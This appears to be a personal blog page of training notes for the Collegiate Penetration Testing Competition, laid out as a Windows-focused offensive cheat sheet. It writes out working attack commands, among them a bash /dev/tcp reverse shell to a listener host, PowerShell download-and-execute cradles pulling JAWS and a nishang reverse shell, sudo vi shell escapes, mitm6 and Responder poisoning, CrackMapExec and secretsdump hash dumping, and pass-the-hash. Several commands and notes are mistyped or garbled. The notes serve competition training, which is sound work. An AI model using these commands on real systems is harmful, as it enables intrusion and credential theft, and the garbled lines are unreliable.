CPTC Training

Table of Contents

Notes from training as windows specialist for the Collegiate Penetration Testing Competition. The contents of this post is provided for educational purposes only.

Tools

Network enumeration

Nmap

nmap -A 10.0.0.1
  • Flags
    • sC run default scripts.
    • sS only sends tcp syn packet and no acknowledgemnt allows for a faster less noisy scan.
    • sV tries to find the version number of any running services/OS.
    • Pn no pinging uses tcp syn packets.
    • oA output results in all formats to file.
  • States
    • Open

    Tcp syn ack is recieved so a service is running on the port.

    • Closed Port

    Tcp syn rst packet is recieved from port which means no services are running on the port.

    • Filtered

    No response was recieved from the port.

Bloodhound

bloodhound is useful for visualizing active directory networks.

working with smb client

Useful for interacting with smb a network file sharing protocol.

smbclient -L //10.10.10.1

mount a smb share

mkdir -p /mnt/smb
mount -t cifs //10.10.10.1/Backups /mnt/smb

smbmap attempts to write a file to mounted share which is noisy.

smbmap -u example -H 10.10.10.1

Download contents of anonymous ftp share

wget -m --no-passive ftp://anonymous:anonymous@10.10.10.1

Reading micrsoft outlock email folder

readpst example.pst

Dirbuster

dirbuster /usr/share/wordlists/dirbuster directory list

Joining hardwired Ethernet network with kali

ip addr add 10.0.0.104/16 dev eth0
route add default gw 10.0.0.1 eth0

Gobuster

gobuster -u http://10.10.10.1 -w /usr/share/wordlists/dirbuster/...

Search for aspx files

gobuster -u http:10.0.0.1 -w /urs/share/wordlists/directory-list-2.3-small.txt -x aspx -o gobuster-default-aspx.log

Enum4linux

enumerates users on windows smb

enum4linux -p 'example' -R 1000-1150 10.0.0.1

Remote desktop

Allows you to remote desktop into windows box

rdesktop 10.0.0.1

Exploitation

searchsploit

searchsploit magento
searchsploit -x /exploits/php/webapps/32808.txt

Bash & Netcat reverse shell

"bash -c 'bash -i >& /dev/tcp/10.10.14.3/9001 0>&1'"
nc -lvnp 9001

Responder

MDNS Poisoning

responder -l eth0 --wpad

vi privilege escalation

sudo -l
sudo vi /var/www/html/example
:!/bin/bash

mitm6

mitm6 -d lab.local

Cracking zip files

zip2john test.zip > test.hash
john test.hash --wordlist=/usr/share/wordlists/...

search mdb directory

apt-get install mdbtools
mdb-sql example.mdb
> tables go
for i in $(mdb-tables example.mdb);do mdb-export examle.mdb $i > tables/$i; done

Kerberoasting

CrackMapExec

apt-get install crackmapexec

Get local acount hashes

cme smb -u sanchez  -p password -d Domain 10.0.0.1 --sam

Get hashes of every account in domain

cme smb -u sanchez  -p password -d Domain 10.0.0.1 --drusapi

Psexec

Hydra

brute force logins to things

Lanman

stores hashes

Switch traffic attack

flood with arp requests so that it fails to hub mode.

IASS

upload aspx config for rce.

Post exploitation

get Windows admin password hashes

Windows/System32/config/SAM - contents of user password hashes

WIndows/System32/config/SYSTEM

impacket-secretsdump -sam SAM -system SYSTEM local

Perform pass the hash with smb map

smbmap -U l3mje -h <password hash> -H 10.10.10.1

nbstat

nbstat -a

windows check administrator

net localgroup administrators

priv escalation

JAWS - Just another windows enum script Powershell

IEX(New-Object Net WebClient) downloadString('http://10.10.14.3:8080/jaws-enum.ps1')

Using nishang reverse tcp shell

Run on box with nishang powershell script

python -m SimpleHTTPServer

Run on box you want to create the reverse shell on

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.1:8000/nishang.ps1')

security identifier

  • 501 admin
  • 100 > user accounts

List service

with nstat

Wmic

  • Useful for querying information
  • Stealthy used by applications
pth-wmic -U 'domain\username'%'Asdf1234' //10.128.192.84 "select * from Win32_LoggedOnUser"

System info

pth-wmic -U 'domain\username'%'Asdf1234' //10.128.192.84 "select Buildtype from win32_operatingsystem"

Windows

login

  • Userid
  • Password
  • Domain

ntlm

ntlmv1

easier to crack passwords pass the hash

ntlmv2

Can't pass the hash.

event log

Sources

Last updated: 2019-11-07 Thu

Home